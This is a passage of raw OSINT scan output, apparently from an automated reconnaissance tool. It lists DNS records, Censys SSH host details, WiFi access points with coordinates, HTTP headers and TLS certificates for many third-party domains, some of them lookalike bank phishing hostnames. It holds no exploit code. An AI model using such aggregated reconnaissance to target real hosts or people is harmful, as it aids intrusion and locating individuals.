{"record_type": "A", "resolved_at": "2023-01-28T13:51:50.151234045Z"}, "project-shovel.a2ksols.com": {"record_type": "CNAME", "resolved_at": "2022-11-27T12:31:55.444448412Z"}, "gifs.njtierney.com": {"record_type": "CNAME", "resolved_at": "2023-02-02T13:54:59.563858179Z"}, "blacksapps.co.uk": {"record_type": "A", "resolved_at": "2022-12-30T16:59:38.077685979Z"}, "www.xzone.com.ng": {"record_type": "A", "resolved_at": "2022-10-05T17:05:45.726154444Z"}, "www.shootingzone.pl": {"record_type": "A", "resolved_at": "2023-04-11T21:54:42.064712084Z"}, "shedio.net": {"record_type": "A", "resolved_at": "2022-10-16T19:21:41.523215446Z"}, "made.by.finn.mrcode.io": {"record_type": "CNAME", "resolved_at": "2023-01-27T15:12:08.705210499Z"}, "www.massagem.pro": {"record_type": "CNAME", "resolved_at": "2022-10-18T05:05:09.563568925Z"}, "trip.sphynxsociety.xyz": {"record_type": "CNAME", "resolved_at": "2023-05-01T21:10:50.309574617Z"}, "backup.iven233.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:37:16.079097214Z"}, "apprendre-documentaire.fr": {"record_type": "A", "resolved_at": "2022-11-02T15:07:17.663319916Z"}, "secretacademy.net": {"record_type": "A", "resolved_at": "2022-12-15T16:28:00.127645461Z"}, "websitesfortherestofus.com": {"record_type": "A", "resolved_at": "2023-03-02T15:22:49.400193761Z"}, "www.shaialoni.com": {"record_type": "A", "resolved_at": "2023-04-22T00:21:08.550841995Z"}, "bemorehabits.com": {"record_type": "A", "resolved_at": "2023-03-19T23:04:45.682295209Z"}, "www.thelandlockedsurfers.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T09:35:01.873283724Z"}, "zenbiz-bootstrap.htmlfactory.net": {"record_type": "CNAME", "resolved_at": "2023-04-15T19:03:30.846095347Z"}, "pratistharanabhat.com.np": {"record_type": "A", "resolved_at": "2022-11-28T16:49:33.673247128Z"}, "myrevma.medevio.cz": {"record_type": "CNAME", "resolved_at": "2022-12-21T14:20:47.186191316Z"}, "dogsilly.com": {"record_type": "A", "resolved_at": "2022-10-18T06:59:21.310898610Z"}, "feedback.nuhoc.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T05:08:22.974703827Z"}, "stauchen-stories.com": {"record_type": "A", "resolved_at": "2023-04-01T17:03:52.440044284Z"}, "docs.geobanken.no": {"record_type": "CNAME", "resolved_at": "2022-10-10T05:19:11.913724301Z"}}, "names": ["www.thelandlockedsurfers.com", "pixiejarmint.com", "www.melbourne-directory.com.au", "gkua.tymber.io", "bapplause.merchforall.com", "decorland-zipblind.showcase.sg | 34.148.97.127 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | internal (Net ID: 00:0C:41:12:D6:E5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EE:D7:F2) | 41.8781, -87.6298 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | REL (Net ID: 00:02:2D:02:35:63) | 37.780462,-122.390564 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 131.97.148.34.bc.googleusercontent.com | 34.148.97.131 |
| 2023-05-12 03:41:55 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | mail.inflany.com | 45.131.109.47 |
| 2023-05-12 03:03:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b8:46:5d:ac:6d:f3:78:e1:a9:4f:74:a7:83:2a:
f1:af:bd:cc:66:b6:b9:bf:84:6f:47:9b:97:1c:a8:
c9:7d:6c:fe:9e:8e:79:9c:a5:37:f9:7d:7a:a0:3b:
dd:dd:59:27:44:ef:fa:f9:9f:ac:5e:a7:96:85:d6:
12:a4:67:16:8a:d5:1c:b5:d1:2d:4e:c7:ec:3d:19:
e5:de:7b:f7:77:77:6b:39:f5:6c:f2:bc:49:15:e4:
d9:26:16:d0:09:ff:d0:9f:cc:e1:2f:72:cd:5d:49:
42:8f:44:ab:2b:64:2c:16:15:0b:c6:a8:c4:87:48:
5c:ca:2c:13:33:5b:9e:8f:26:9e:57:1a:3f:da:51:
8d:e5:86:b3:d8:b8:bb:9b:a8:35:c1:05:df:6d:60:
e8:57:86:af:77:94:58:18:ee:4d:cc:61:8e:ef:d8:
ae:1a:ad:73:4e:d6:21:83:54:e8:94:6d:be:b2:5a:
91:8d:86:36:60:55:a8:6c:ac:42:09:7d:39:a2:a8:
c7:4d:09:67:42:98:43:91:4c:6e:9c:44:89:71:c9:
81:24:98:ab:01:48:f5:7f:9f:03:76:19:5e:40:1f:
e2:a9:ac:0e:74:15:d2:c7:02:a6:94:0f:07:1e:c2:
8f:1c:65:ac:eb:0a:21:1c:42:25:eb:b3:3c:e5:3d:
0f:68:8a:07:35:fd:f2:bf:65:bb:27:0a:28:75:d7:
36:a5:f8:ad:87:2d:4d:e9:8c:44:1c:dd:e0:1f:f8:
19:b0:d2:ba:53:d4:71:e9:68:d3:d7:47:bd:bd:b3:
12:21:a8:7f:36:dd:3a:ee:09:ec:a7:f6:99:fc:9a:
ee:64:c3:e9:cb:48:8b:5b:53:b6:9a:34:49:ed:6f:
97:8c:71:a4:8f:ff:5a:94:b4:2f:23:08:04:1f:5f:
dd:ba:07:c4:98:26:ce:e7:92:3f:eb:aa:ca:85:d1:
9e:9d:66:9d:15:94:f9:a8:c4:87:5f:d8:0f:2a:bd:
f6:c1:3a:15:a4:4a:73:81:4d:25:59:6c:74:3c:88:
be:35:3a:e2:55:b7:aa:f2:6a:84:aa:03:d7:47:36:
8c:65:79:0d:82:62:5e:32:88:98:91:5f:e7:41:ad:
df:3b:04:9a:a4:b7:e8:4a:dc:51:e1:1a:2e:5f:80:
9f:10:99:df:13:16:07:60:53:0f:70:88:4d:8b:bf:
c2:83:ad:7d:95:a6:63:06:b5:f7:e1:fa:b4:f1:f2:
59:97:a4:23:6e:6f:a1:9d:e7:91:3c:8f:96:90:d0:
88:f8:42:7e:b9:a8:0b:95:b2:4a:f1:e1:43:89:bc:
d0:c5:6e:8d:7a:6f:1a:ac:22:35:41:3f:62:4c:b0:
b4:f9:c1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
12:c3:23:0c:67:c6:85:51:aa:d3:80:18:b2:65:bd:31:94:8a:
e8:5c:6a:01:d8:5d:c1:9e:5e:a1:8a:00:bf:31:a6:2d:2b:2a:
d3:2e:c1:cb:48:32:97:61:63:f9:88:e4:9c:86:57:55:70:0b:
32:91:1a:0d:37:95:fb:a7:7b:4a:02:c1:4f:b7:cf:20:cf:d1:
69:54:62:41:0e:be:38:0e:7b:77:6c:7e:42:cd:d3:80:5f:ab:
19:e5:8c:24:db:b5:99:d7:5b:1e:e0:f9:51:35:ee:2e:e0:f2:
3b:0e:28:4f:52:fb:a4:cb:e5:d4:44:71:e2:b7:97:1e:35:f2:
db:f3:26:a9:1f:bb:8d:8d:14:2e:84:1c:98:58:cd:d8:11:56:
db:34:47:2c:b7:4d:26:01:fe:51:2b:7a:54:d2:4b:ab:c8:ee:
ec:9f:45:39:6f:fe:90:a4:3d:93:8b:30:b0:a3:b3:2d:bc:f4:
ee:4f:24:be:81:68:9c:c9:32:9e:f9:8d:83:ca:11:33:39:6f:
6f:95:05:65:ef:78:3c:14:e2:53:b2:de:b5:09:28:66:eb:7a:
0b:3e:3f:89:c9:6f:58:91:18:c2:4c:16:9c:f4:c2:32:78:48:
59:ef:54:a6:fe:8f:f7:3b:d0:54:03:d1:5b:32:86:ec:46:0e:
b4:71:65:41
|
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:33:52 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
VC6.NV
cN u:v
O3dufp
YEexY?w
a:Y7"
O5dgc
vR K
nkRZD
227sO5d
ffFsk
4kFQZW
/\\J
J 4 N
AaoCX
9$BfJ
cod:5j
M:IBU
VBjeb
d<nDA
`CK2nF
Zl`Q`
D':XB6
_dmVA
zLrzr
`G\.A
1!lF:N
?vRerLz
'ac:YB
IDATt
ac:gf
>B6qj8
"IURI
jBWK5
/U--3ul.
-$ul/Hu2
p?6'
tcW>N`G
vyL K
/T_t?V
IDAT4
Mvaea
d WmN
l@OS9Z
8?$m9U
.9`-i
o-.Hw
bazHbqf
0glrO
pyaI?o
.Namj
e@!Pu
WZy4d
4vU.N<
O9A1m
V`V5KE
J:'`W
LEKC
rf3GKrO
W'xwu
vlj8>E
XV0s_X
>'GA:
"V_VZI
>l@ K
ffff.3
` Y3u
1spu.
1fiWVr
X"d \/hu
!k@k\
D7qvq
tS'CV
jLp2.3
E-Wh@k
fSwtn
Wq!AK
\Bwaf
Xia>J
IDAT9fma
'F11:
/Oamr
uTl6`M
\ X'
gGaq9
5muiN\
bkMrSz
YMzjm
. TB4
.fmbVvJ
l2LSu
kOrv/!
RxB J
IDAT/I
!KEkC
uvl5qY
-U9!B
dFvdb
spyoi
USxLf1 | https://funny.battleb0t.xyz/images/nwp.PNG |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/nomnom.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:44:16 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': 